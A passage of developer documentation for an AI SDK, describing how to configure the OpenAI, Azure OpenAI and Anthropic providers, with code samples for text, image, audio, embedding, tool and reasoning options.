  ...usage,
  cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});

For GPT-5.1 models, you can enable extended prompt caching that keeps cached prefixes active for up to 24 hours:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text, usage, providerMetadata } = await generateText({
  model: openai.chat('gpt-5.1'),
  prompt: `A 1024-token or longer prompt...`,
  providerOptions: {
    openai: {
      promptCacheKey: 'my-custom-cache-key-123',
      promptCacheRetention: '24h', // Extended caching for GPT-5.1
    },
  },
});

console.log(`usage:`, {
  ...usage,
  cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});

Audio Input

With the gpt-4o-audio-preview model, you can pass audio files to the model.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.chat('gpt-4o-audio-preview'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'What is the audio saying?' },
        {
          type: 'file',
          mediaType: 'audio/mpeg',
          data: fs.readFileSync('./data/galileo.mp3'),
        },
      ],
    },
  ],
});

Completion Models

You can create models that call the OpenAI completions API using the .completion() factory method. The first argument is the model id. Currently only gpt-3.5-turbo-instruct is supported.

const model = openai.completion('gpt-3.5-turbo-instruct');

OpenAI completion models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

const model = openai.completion('gpt-3.5-turbo-instruct');

await model.doGenerate({
  providerOptions: {
    openai: {
      echo: true, // optional, echo the prompt in addition to the completion
      logitBias: {
        // optional likelihood for specific tokens
        '50256': -100,
      },
      suffix: 'some text', // optional suffix that comes after a completion of inserted text
      user: 'test-user', // optional unique user identifier
    },
  },
});

The following optional provider options are available for OpenAI completion models:

echo: boolean

Echo back the prompt in addition to the completion.
logitBias Record<number, number>

Modifies the likelihood of specified tokens appearing in the completion.

Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
logprobs boolean | number

Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

Setting to true will return the log probabilities of the tokens that were generated.

Setting to a number will return the log probabilities of the top n tokens that were generated.
suffix string

The suffix that comes after a completion of inserted text.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Model Capabilities

Model	Image Input	Audio Input	Object Generation	Tool Usage
`gpt-5.4-pro`
`gpt-5.4`
`gpt-5.4-mini`
`gpt-5.4-nano`
`gpt-5.3-chat-latest`
`gpt-5.2-pro`
`gpt-5.2-chat-latest`
`gpt-5.2`
`gpt-5.1-codex-mini`
`gpt-5.1-codex`
`gpt-5.1-chat-latest`
`gpt-5.1`
`gpt-5-pro`
`gpt-5`
`gpt-5-mini`
`gpt-5-nano`
`gpt-5-codex`
`gpt-5-chat-latest`
`gpt-4.1`
`gpt-4.1-mini`
`gpt-4.1-nano`
`gpt-4o`
`gpt-4o-mini`

Embedding Models

You can create models that call the OpenAI embeddings API using the .textEmbedding() factory method.

const model = openai.textEmbedding('text-embedding-3-large');

OpenAI embedding models support several additional provider options. You can pass them as an options argument:

import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';

const { embedding } = await embed({
  model: openai.textEmbedding('text-embedding-3-large'),
  value: 'sunny day at the beach',
  providerOptions: {
    openai: {
      dimensions: 512, // optional, number of dimensions for the embedding
      user: 'test-user', // optional unique user identifier
    },
  },
});

The following optional provider options are available for OpenAI embedding models:

dimensions: number

The number of dimensions the resulting output embeddings should have. Only supported in text-embedding-3 and later models.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Model Capabilities

Model	Default Dimensions	Custom Dimensions
`text-embedding-3-large`	3072
`text-embedding-3-small`	1536
`text-embedding-ada-002`	1536

Image Models

You can create models that call the OpenAI image generation API using the .image() factory method.

const model = openai.image('dall-e-3');

Model Capabilities

Model	Sizes
`gpt-image-1.5`	1024x1024, 1536x1024, 1024x1536
`gpt-image-1-mini`	1024x1024, 1536x1024, 1024x1536
`gpt-image-1`	1024x1024, 1536x1024, 1024x1536
`dall-e-3`	1024x1024, 1792x1024, 1024x1792
`dall-e-2`	256x256, 512x512, 1024x1024

You can pass optional providerOptions to the image model. These are prone to change by OpenAI and are model dependent. For example, the gpt-image-1 model supports the quality option:

const { image, providerMetadata } = await generateImage({
  model: openai.image('gpt-image-1.5'),
  prompt: 'A salamander at sunrise in a forest pond in the Seychelles.',
  providerOptions: {
    openai: { quality: 'high' },
  },
});

For more on generateImage() see Image Generation.

OpenAI's image models return additional metadata in the response that can be accessed via providerMetadata.openai. The following OpenAI-specific metadata is available:

images Array<object>

Array of image-specific metadata. Each image object may contain:
- revisedPrompt string - The revised prompt that was actually used to generate the image (OpenAI may modify your prompt for safety or clarity)
- created number - The Unix timestamp (in seconds) of when the image was created
- size string - The size of the generated image. One of 1024x1024, 1024x1536, or 1536x1024
- quality string - The quality of the generated image. One of low, medium, or high
- background string - The background parameter used for the image generation. Either transparent or opaque
- outputFormat string - The output format of the generated image. One of png, webp, or jpeg

For more information on the available OpenAI image model options, see the OpenAI API reference.

Transcription Models

You can create models that call the OpenAI transcription API using the .transcription() factory method.

The first argument is the model id e.g. whisper-1.

const model = openai.transcription('whisper-1');

import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';

const result = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new Uint8Array([1, 2, 3, 4]),
  providerOptions: { openai: { language: 'en' } },
});

To get word-level timestamps, specify the granularity:

import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';

const result = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new Uint8Array([1, 2, 3, 4]),
  providerOptions: {
    openai: {
      //timestampGranularities: ['word'],
      timestampGranularities: ['segment'],
    },
  },
});

// Access word-level timestamps
console.log(result.segments); // Array of segments with startSecond/endSecond

The following provider options are available:

timestampGranularities string[] The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
language string The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
prompt string An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
temperature number The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
include string[] Additional information to include in the transcription response.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`whisper-1`
`gpt-4o-mini-transcribe`
`gpt-4o-transcribe`

Speech Models

You can create models that call the OpenAI speech API using the .speech() factory method.

The first argument is the model id e.g. tts-1.

const model = openai.speech('tts-1');

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying a voice to use for the generated audio.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';

const result = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  providerOptions: { openai: {} },
});

instructions string Control the voice of your generated audio with additional instructions e.g. "Speak in a slow and steady tone". Does not work with tts-1 or tts-1-hd. Optional.
response_format string The format to audio in. Supported formats are mp3, opus, aac, flac, wav, and pcm. Defaults to mp3. Optional.
speed number The speed of the generated audio. Select a value from 0.25 to 4.0. Defaults to 1.0. Optional.

Model Capabilities

Model	Instructions
`tts-1`
`tts-1-hd`
`gpt-4o-mini-tts`

title: Azure OpenAI description: Learn how to use the Azure OpenAI provider for the AI SDK.

Azure OpenAI Provider

The Azure OpenAI provider contains language model support for the Azure OpenAI chat API.

Setup

The Azure OpenAI provider is available in the @ai-sdk/azure module. You can install it with

Provider Instance

You can import the default provider instance azure from @ai-sdk/azure:

import { azure } from '@ai-sdk/azure';

If you need a customized setup, you can import createAzure from @ai-sdk/azure and create a provider instance with your settings:

import { createAzure } from '@ai-sdk/azure';

const azure = createAzure({
  resourceName: 'your-resource-name', // Azure resource name
  apiKey: 'your-api-key',
});

You can use the following optional settings to customize the OpenAI provider instance:

resourceName string

Azure resource name. It defaults to the AZURE_RESOURCE_NAME environment variable.

The resource name is used in the assembled URL: https://{resourceName}.openai.azure.com/openai/v1{path}. You can use baseURL instead to specify the URL prefix.
apiKey string

API key that is being sent using the api-key header. It defaults to the AZURE_API_KEY environment variable.
apiVersion string

Sets a custom api version. Defaults to v1.
baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers.

Either this or resourceName can be used. When a baseURL is provided, the resourceName is ignored.

With a baseURL, the resolved URL is {baseURL}/v1{path}.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
useDeploymentBasedUrls boolean

Use deployment-based URLs for API calls. Set to true to use the legacy deployment format: {baseURL}/deployments/{deploymentId}{path}?api-version={apiVersion} instead of {baseURL}/v1{path}?api-version={apiVersion}. Defaults to false.

This option is useful for compatibility with certain Azure OpenAI models or deployments that require the legacy endpoint format.

Language Models

The Azure OpenAI provider instance is a function that you can invoke to create a language model:

const model = azure('your-deployment-name');

You need to pass your deployment name as the first argument.

Reasoning Models

import { azure } from '@ai-sdk/azure';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const enhancedModel = wrapLanguageModel({
  model: azure('your-deepseek-r1-deployment-name'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

You can then use that enhanced model in functions like generateText and streamText.

Example

You can use OpenAI language models to generate text with the generateText function:

import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';

const { text } = await generateText({
  model: azure('your-deployment-name'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

OpenAI language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core).

Provider Options

const messages = [
  {
    role: 'user',
    content: [
      {
        type: 'text',
        text: 'What is the capital of the moon?',
      },
      {
        type: 'image',
        image: 'https://example.com/image.png',
        providerOptions: {
          openai: { imageDetail: 'low' },
        },
      },
    ],
  },
];

const { text } = await generateText({
  model: azure('your-deployment-name'),
  providerOptions: {
    openai: {
      reasoningEffort: 'low',
    },
  },
});

Chat Models

Azure OpenAI chat models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure('your-deployment-name'),
  prompt: 'Write a short story about a robot.',
  providerOptions: {
    openai: {
      logitBias: {
        // optional likelihood for specific tokens
        '50256': -100,
      },
      user: 'test-user', // optional unique user identifier
    },
  },
});

The following optional provider options are available for OpenAI chat models:

logitBias Record<number, number>

Modifies the likelihood of specified tokens appearing in the completion.

Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

As an example, you can pass {"50256": -100} to prevent the token from being generated.
logprobs boolean | number

Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

Setting to true will return the log probabilities of the tokens that were generated.

Setting to a number will return the log probabilities of the top n tokens that were generated.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. Default to true.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Responses Models

You can use the Azure OpenAI responses API with the azure.responses(deploymentName) factory method.

const model = azure.responses('your-deployment-name');

Further configuration can be done using OpenAI provider options. You can validate the provider options using the OpenAIResponsesProviderOptions type.

import { azure, OpenAIResponsesProviderOptions } from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure.responses('your-deployment-name'),
  providerOptions: {
    openai: {
      parallelToolCalls: false,
      store: false,
      user: 'user_123',
      // ...
    } satisfies OpenAIResponsesProviderOptions,
  },
  // ...
});

The following provider options are available:

parallelToolCalls boolean Whether to use parallel tool calls. Defaults to true.
store boolean Whether to store the generation. Defaults to true.
metadata Record<string, string> Additional metadata to store with the generation.
previousResponseId string The ID of the previous response. You can use it to continue a conversation. Defaults to undefined.
instructions string Instructions for the model. They can be used to change the system or developer message when continuing a conversation using the previousResponseId option. Defaults to undefined.
user string A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Defaults to undefined.
reasoningEffort 'low' | 'medium' | 'high' Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
strictJsonSchema boolean Whether to use strict JSON schema validation. Defaults to false.

The Azure OpenAI responses provider also returns provider-specific metadata:

const { providerMetadata } = await generateText({
  model: azure.responses('your-deployment-name'),
});

const openaiMetadata = providerMetadata?.openai;

The following OpenAI-specific metadata is returned:

responseId string The ID of the response. Can be used to continue a conversation.
cachedPromptTokens number The number of prompt tokens that were a cache hit.
reasoningTokens number The number of reasoning tokens that the model generated.

Web Search Tool

The Azure OpenAI responses API supports web search(preview) through the azure.tools.webSearchPreview tool.

const result = await generateText({
  model: azure('gpt-4.1-mini'),
  prompt: 'What happened in San Francisco last week?',
  tools: {
    web_search_preview: azure.tools.webSearchPreview({
      // optional configuration:
      searchContextSize: 'low',
      userLocation: {
        type: 'approximate',
        city: 'San Francisco',
        region: 'California',
      },
    }),
  },
  // Force web search tool (optional):
  toolChoice: { type: 'tool', toolName: 'web_search_preview' },
});

console.log(result.text);

// URL sources directly from `results`
const sources = result.sources;
for (const source of sources) {
  console.log('source:', source);
}

File Search Tool

The Azure OpenAI responses API supports file search through the azure.tools.fileSearch tool.

You can force the use of the file search tool by setting the toolChoice parameter to { type: 'tool', toolName: 'file_search' }.

const result = await generateText({
  model: azure.responses('gpt-5'),
  prompt: 'What does the document say about user authentication?',
  tools: {
    file_search: azure.tools.fileSearch({
      // optional configuration:
      vectorStoreIds: ['vs_123', 'vs_456'],
      maxNumResults: 10,
      ranking: {
        ranker: 'auto',
      },
    }),
  },
  // Force file search tool:
  toolChoice: { type: 'tool', toolName: 'file_search' },
});

Image Generation Tool

Azure OpenAI's Responses API supports multi-modal image generation as a provider-defined tool. Availability is restricted to specific models (for example, gpt-5 variants).

You can use the image tool with generateText.

import { createAzure } from '@ai-sdk/azure';
import { generateText } from 'ai';

const azure = createAzure({
  headers: {
    'x-ms-oai-image-generation-deployment': 'gpt-image-1', // use your own image model deployment
  },
});

const result = await generateText({
  model: azure.responses('gpt-5'),
  prompt:
    'Generate an image of an echidna swimming across the Mozambique channel.',
  tools: {
    image_generation: azure.tools.imageGeneration({ outputFormat: 'png' }),
  },
});

for (const toolResult of result.staticToolResults) {
  if (toolResult.toolName === 'image_generation') {
    const base64Image = toolResult.output.result;
  }
}

Code Interpreter Tool

The Azure OpenAI responses API supports the code interpreter tool through the azure.tools.codeInterpreter tool. This allows models to write and execute Python code.

import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure.responses('gpt-5'),
  prompt: 'Write and run Python code to calculate the factorial of 10',
  tools: {
    code_interpreter: azure.tools.codeInterpreter({
      // optional configuration:
      container: {
        fileIds: ['assistant-123', 'assistant-456'], // optional file IDs to make available
      },
    }),
  },
});

The code interpreter tool can be configured with:

container: Either a container ID string or an object with fileIds to specify uploaded files that should be available to the code interpreter

PDF support

The Azure OpenAI Responses API supports reading PDF files. You can pass PDF files as part of the message content using the file type:

const result = await generateText({
  model: azure.responses('your-deployment-name'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
          filename: 'ai.pdf', // optional
        },
      ],
    },
  ],
});

Completion Models

You can create models that call the completions API using the .completion() factory method. The first argument is the model id. Currently only gpt-35-turbo-instruct is supported.

const model = azure.completion('your-gpt-35-turbo-instruct-deployment');

OpenAI completion models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure.completion('your-gpt-35-turbo-instruct-deployment'),
  prompt: 'Write a haiku about coding.',
  providerOptions: {
    openai: {
      echo: true, // optional, echo the prompt in addition to the completion
      logitBias: {
        // optional likelihood for specific tokens
        '50256': -100,
      },
      suffix: 'some text', // optional suffix that comes after a completion of inserted text
      user: 'test-user', // optional unique user identifier
    },
  },
});

The following optional provider options are available for Azure OpenAI completion models:

echo: boolean

Echo back the prompt in addition to the completion.
logitBias Record<number, number>

Modifies the likelihood of specified tokens appearing in the completion.

Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
logprobs boolean | number

Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

Setting to true will return the log probabilities of the tokens that were generated.

Setting to a number will return the log probabilities of the top n tokens that were generated.
suffix string

The suffix that comes after a completion of inserted text.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Embedding Models

You can create models that call the Azure OpenAI embeddings API using the .textEmbedding() factory method.

const model = azure.textEmbedding('your-embedding-deployment');

Azure OpenAI embedding models support several additional settings. You can pass them as an options argument:

import { azure } from '@ai-sdk/azure';
import { embed } from 'ai';

const { embedding } = await embed({
  model: azure.textEmbedding('your-embedding-deployment'),
  value: 'sunny day at the beach',
  providerOptions: {
    openai: {
      dimensions: 512, // optional, number of dimensions for the embedding
      user: 'test-user', // optional unique user identifier
    },
  },
});

The following optional provider options are available for Azure OpenAI embedding models:

dimensions: number

The number of dimensions the resulting output embeddings should have. Only supported in text-embedding-3 and later models.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Image Models

You can create models that call the Azure OpenAI image generation API (DALL-E) using the .image() factory method. The first argument is your deployment name for the DALL-E model.

const model = azure.image('your-dalle-deployment-name');

Azure OpenAI image models support several additional settings. You can pass them as providerOptions.openai when generating the image:

await generateImage({
  model: azure.image('your-dalle-deployment-name'),
  prompt: 'A photorealistic image of a cat astronaut floating in space',
  size: '1024x1024', // '1024x1024', '1792x1024', or '1024x1792' for DALL-E 3
  providerOptions: {
    openai: {
      user: 'test-user', // optional unique user identifier
      responseFormat: 'url', // 'url' or 'b64_json', defaults to 'url'
    },
  },
});

Example

You can use Azure OpenAI image models to generate images with the generateImage function:

import { azure } from '@ai-sdk/azure';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: azure.image('your-dalle-deployment-name'),
  prompt: 'A photorealistic image of a cat astronaut floating in space',
  size: '1024x1024', // '1024x1024', '1792x1024', or '1024x1792' for DALL-E 3
});

// image contains the URL or base64 data of the generated image
console.log(image);

Model Capabilities

Azure OpenAI supports DALL-E 2 and DALL-E 3 models through deployments. The capabilities depend on which model version your deployment is using:

Model Version	Sizes
DALL-E 3	1024x1024, 1792x1024, 1024x1792
DALL-E 2	256x256, 512x512, 1024x1024

Transcription Models

You can create models that call the Azure OpenAI transcription API using the .transcription() factory method.

The first argument is the model id e.g. whisper-1.

const model = azure.transcription('whisper-1');

const azure = createAzure({
  useDeploymentBasedUrls: true,
  apiVersion: '2025-04-01-preview',
});

This uses the legacy endpoint format which may be required for certain Azure OpenAI deployments. When using useDeploymentBasedUrls, the default api-version is not valid. You must set it to 2025-04-01-preview or an earlier value.

import { experimental_transcribe as transcribe } from 'ai';
import { azure } from '@ai-sdk/azure';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: azure.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
  providerOptions: { openai: { language: 'en' } },
});

The following provider options are available:

timestampGranularities string[] The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
language string The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
prompt string An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
temperature number The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
include string[] Additional information to include in the transcription response.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`whisper-1`
`gpt-4o-mini-transcribe`
`gpt-4o-transcribe`

title: Anthropic description: Learn how to use the Anthropic provider for the AI SDK.

Anthropic Provider

The Anthropic provider contains language model support for the Anthropic Messages API.

Setup

The Anthropic provider is available in the @ai-sdk/anthropic module. You can install it with

Provider Instance

You can import the default provider instance anthropic from @ai-sdk/anthropic:

import { anthropic } from '@ai-sdk/anthropic';

If you need a customized setup, you can import createAnthropic from @ai-sdk/anthropic and create a provider instance with your settings:

import { createAnthropic } from '@ai-sdk/anthropic';

const anthropic = createAnthropic({
  // custom settings
});

You can use the following optional settings to customize the Anthropic provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.anthropic.com/v1.
apiKey string

API key that is being sent using the x-api-key header. It defaults to the ANTHROPIC_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Anthropic Messages API using the provider instance. The first argument is the model id, e.g. claude-3-haiku-20240307. Some models have multi-modal capabilities.

const model = anthropic('claude-3-haiku-20240307');

You can use Anthropic language models to generate text with the generateText function:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: anthropic('claude-3-haiku-20240307'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Anthropic language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core).

The following optional provider options are available for Anthropic models:

disableParallelToolUse boolean

Optional. Disables the use of parallel tool calls. Defaults to false.

When set to true, the model will only call one tool at a time instead of potentially calling multiple tools in parallel.
sendReasoning boolean

Optional. Include reasoning content in requests sent to the model. Defaults to true.

If you are experiencing issues with the model handling requests involving reasoning content, you can set this to false to omit them from the request.
effort "low" | "medium" | "high" | "xhigh" | "max"

Optional. See Effort section for more details.
taskBudget object

Optional. See Task Budgets section for more details.
speed "fast" | "standard"

Optional. See Fast Mode section for more details.
inferenceGeo "us" | "global"

Optional. See Data Residency section for more details.
thinking object

Optional. See Reasoning section for more details.
effort "high" | "medium" | "low"

Optional. See Effort section for more details.
toolStreaming boolean

Whether to enable tool streaming (and structured output streaming). Default to true.
structuredOutputMode "outputFormat" | "jsonTool" | "auto"

Determines how structured outputs are generated. Optional.
- "outputFormat": Use the output_format parameter to specify the structured output format.
- "jsonTool": Use a special "json" tool to specify the structured output format (default).
- "auto": Use "outputFormat" when supported, otherwise fall back to "jsonTool".
metadata object

Optional. Metadata to include with the request. See the Anthropic API documentation for details.
- userId string - An external identifier for the end-user. Should be a UUID, hash, or other opaque identifier. Must not contain PII.

Structured Outputs and Tool Input Streaming

By default, the Anthropic API returns streaming tool calls and structured outputs all at once after a delay. To enable incremental streaming of tool inputs (when using streamText with tools) and structured outputs (when using streamObject), you need to set the anthropic-beta header to fine-grained-tool-streaming-2025-05-14.

For structured outputs with `streamObject`

import { anthropic } from '@ai-sdk/anthropic';
import { streamObject } from 'ai';
import { z } from 'zod';

const result = streamObject({
  model: anthropic('claude-sonnet-4-20250514'),
  schema: z.object({
    characters: z.array(
      z.object({
        name: z.string(),
        class: z.string(),
        description: z.string(),
      }),
    ),
  }),
  prompt: 'Generate 3 character descriptions for a fantasy role playing game.',
  headers: {
    'anthropic-beta': 'fine-grained-tool-streaming-2025-05-14',
  },
});

for await (const partialObject of result.partialObjectStream) {
  console.log(partialObject);
}

For tool input streaming with `streamText`

import { anthropic } from '@ai-sdk/anthropic';
import { streamText, tool } from 'ai';
import { z } from 'zod';

const result = streamText({
  model: anthropic('claude-sonnet-4-20250514'),
  tools: {
    writeFile: tool({
      description: 'Write content to a file',
      inputSchema: z.object({
        path: z.string(),
        content: z.string(),
      }),
      execute: async ({ path, content }) => {
        // Implementation
        return { success: true };
      },
    }),
  },
  prompt: 'Write a short story to story.txt',
  headers: {
    'anthropic-beta': 'fine-grained-tool-streaming-2025-05-14',
  },
});

Without this header, tool inputs and structured outputs may arrive all at once after a delay instead of streaming incrementally.

Effort

Anthropic introduced an effort option with claude-opus-4-5 that affects thinking, text responses, and function calls. Effort defaults to high and you can set it to medium or low to save tokens and to lower time-to-last-token latency (TTLT). claude-opus-4-7 additionally supports xhigh for maximum reasoning effort.

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, usage } = await generateText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      effort: 'low',
    } satisfies AnthropicProviderOptions,
  },
});

console.log(text); // resulting text
console.log(usage); // token usage

Fast Mode

Anthropic supports a speed option for claude-opus-4-6 that enables faster inference with approximately 2.5x faster output token speeds.

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: anthropic('claude-opus-4-6'),
  prompt: 'Write a short poem about the sea.',
  providerOptions: {
    anthropic: {
      speed: 'fast',
    } satisfies AnthropicProviderOptions,
  },
});

The speed option accepts 'fast' or 'standard' (default behavior).

Data Residency

Anthropic supports an inferenceGeo option that controls where model inference runs for a request.

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: anthropic('claude-opus-4-6'),
  prompt: 'Summarize the key points of this document.',
  providerOptions: {
    anthropic: {
      inferenceGeo: 'us',
    } satisfies AnthropicProviderOptions,
  },
});

The inferenceGeo option accepts 'us' (US-only infrastructure) or 'global' (default, any available geography).

Task Budgets

claude-opus-4-7 supports a taskBudget option that informs the model of the total token budget available for an agentic turn. The model uses this information to prioritize work, plan ahead, and wind down gracefully as the budget is consumed.

Task budgets are advisory — they do not enforce a hard token limit. The model will attempt to stay within budget, but actual usage may vary.

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: anthropic('claude-opus-4-7'),
  prompt: 'Research the pros and cons of Rust vs Go for building CLI tools.',
  providerOptions: {
    anthropic: {
      taskBudget: {
        type: 'tokens',
        total: 400000,
      },
    } satisfies AnthropicProviderOptions,
  },
});

For long-running agents that compact and restart context, you can carry the remaining budget forward using the remaining field:

taskBudget: {
  type: 'tokens',
  total: 400000,
  remaining: 215000, // budget left after prior compacted-away contexts
}

The taskBudget object accepts:

type "tokens" - Budget type. Currently only "tokens" is supported.
total number - Total task budget for the agentic turn. Minimum 20,000.
remaining number - Budget left after prior compacted-away contexts. Must be between 0 and total. Defaults to total if omitted.

Reasoning

Anthropic has reasoning support for claude-opus-4-20250514, claude-sonnet-4-20250514, and claude-3-7-sonnet-20250219 models.

You can enable it using the thinking provider option and specifying a thinking budget in tokens.

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-opus-4-6'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'adaptive' },
    } satisfies AnthropicProviderOptions,
  },
});

console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response

You can combine adaptive thinking with the effort option to control how much reasoning Claude uses:

const { text } = await generateText({
  model: anthropic('claude-opus-4-6'),
  prompt: 'Invent a new holiday and describe its traditions.',
  providerOptions: {
    anthropic: {
      thinking: { type: 'adaptive' },
      effort: 'max', // 'low' | 'medium' | 'high' | 'xhigh' | 'max'
    } satisfies AnthropicProviderOptions,
  },
});

Thinking Display (Opus 4.7+)

Starting with claude-opus-4-7, thinking content is omitted from the response by default — thinking blocks are present in the stream but their text is empty. To receive reasoning output, set display: 'summarized':

const { text, reasoningText } = await generateText({
  model: anthropic('claude-opus-4-7'),
  providerOptions: {
    anthropic: {
      thinking: { type: 'adaptive', display: 'summarized' },
    } satisfies AnthropicProviderOptions,
  },
  prompt: 'How many people will live in the world in 2040?',
});

console.log(reasoningText); // reasoning text (empty without display: 'summarized')
console.log(text);

Budget-Based Thinking

For earlier models (claude-opus-4-20250514, claude-sonnet-4-20250514, claude-sonnet-4-5-20250929), use type: 'enabled' with an explicit token budget:

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-sonnet-4-5-20250929'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    } satisfies AnthropicProviderOptions,
  },
});

console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

